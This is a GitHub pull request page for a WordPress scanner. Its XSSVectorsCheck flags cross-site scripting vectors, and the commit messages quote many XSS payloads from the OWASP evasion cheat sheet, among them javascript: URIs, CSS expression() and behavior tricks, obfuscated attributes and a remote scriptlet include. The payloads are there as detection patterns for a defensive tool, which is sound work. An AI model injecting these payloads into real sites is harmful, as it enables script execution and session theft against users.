This repository has been archived by the owner on Jul 20, 2018. It is now read-only.
Flagging of common XSS vectors #267
Closed
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
added 30 commits
March 26, 2015 11:24
… efficient scanning. I made this change so that when searching for XSS vulnerabilities, I wouldn't have to run through two foreach ( $this->filter_files() ) blocks. One for php and one for html. It should make scanning multiple types at once much easier.
Includes checks for: javascript in <link> tag href attributes javascript in all HTML tags' style attributes -moz-binding CSS attribute
…ll now scan in the plugin as well.
…tead of adding more sanitization code to each check.
…g() helper function.
Example: <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Examples:
<STYLE>body{ width: expression(alert('XSS')); }</STYLE>
<DIV STYLE="width: expression(alert('XSS'));">
(From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
…hile scanning, like in VIPRestrictedPatternsCheck. This may work right now for the current XSS checks, but that is no guarantee that we will not have to write more specific checks for unique XSS cases.
No use in removing comment blocks if you remove the quotes first. That just won't work.
Examples:
<STYLE>body{ behavior: url(xss.htc); }</STYLE>
<DIV STYLE="behavior: url(xss.htc);">
(From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
This will help for any CSS like this: behavior : url(xss.htc);
…rmed html. Example: < LINK REL = "styleheet" HREF = ' javascript:alert ( "XSS" ); ' >
…ute.
Examples:
<BGSOUND SRC="javascript:alert('XSS');">
(From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
This also searches independent of quote style, if any.
Examples:
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
We now remove encoded tabs (	), newlines (
), carriage returns (
), and null characters.
…ed characters. Checks against malformed whitespace, encoded tabs (	), newlines (
), carriage returns (
), and null characters.
…round attribute.
Examples:
<BODY BACKGROUND="javascript:alert('XSS')">
(From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
…in the scan description, causing quite a ruckus.
…<img> tag attributes.
Examples:
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
(From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
…y-tag-src to account for other scripting languages.
… HTML tag src attributes.
Currently includes vbscript and livescript.
Examples:
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
(From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Examples:
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
(From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
…butes to find unicode obfuscated declarations. Example: <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Examples:
<BASE HREF="javascript:alert('XSS');//">
(From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
It currently did not include the <MATCHTEXT> group name.
added 14 commits
March 27, 2015 01:25
…tead of strpos() to ignore case.
Examples: <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
…ere they may not need it.
… attributes.
Example:
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
The scans cover:
Javascript
body {
background-image:url("javascript:alert('XSS')");
}
Behavior
body {
behavior: url(xss.htc);
}
Moz Binding
body {
-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")
}
Expressions
body {
width: expression(alert('XSS'));
}
CSS and HTML have been added, as those are the new file types being checked in XSSVectorsCheck.
This was causing problems where grep_content() was not finding the correct line to return to show in the scanner.
…k for more specific cases.
After setting the regex to an ungreedy match, it was not properly finding results.
I created a different regex to match the case of javascript broken by html comments.
Example:
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
…k for more specific cases.
After setting the regex to an ungreedy match, it was not properly finding results.
I created a different regex to match the case of javascript in src tags being surrounded by whitespace and obfuscated by whitespace.
Examples:
<IMG SRC=" javascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
In hindsight, we won't be needing to check any HTML files in the unit tests, so this is not necessary.
…w_result_row() to check() in XSSVectorsCheck. After working further, I feel that there may actually be cases where HTML is valid in the scan descriptions. If escaping is necessary, it is probably better to be done on a per-case basis before the description goes to display_theme_review_result_row(). Example: If one wants to link to more information about a security concern or best practice, it may be good to have an HTML link in the description.
…iptive of its contents. The variable $file_types had a name that could cause confusion. Instead of storing file types, it stores files of multiple types (if $type is an array). I renamed it to $files_of_multiple_types to be more in line with what the variable contains.
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This should be the beginnings of a solution to GitHub issue #255.
I used this "XSS Filter Evasion Cheat Sheet" as a guide when creating the scans and unit tests.
I've created a new testing class,
XSSVectorsCheck. This should be able to scan for a number of common XSS attack vectors.There's a good start to unit testing in
test-XSSVectorsCheck.phpbut due to the immense number of ways these XSS vectors can be obfuscated, there's always room to add more tests.CheckTestBase.phphas been modified so thatrunCheck()will now search CSS files, since we now have tests for them.class-base-check.phphas been modified to allowfilter_files()to filter multiple file types at once (GitHub Issue #265 and pull request #266).Finally,
config-vip-scanner.phphas been modified to add in the newXSSVectorsCheckclass.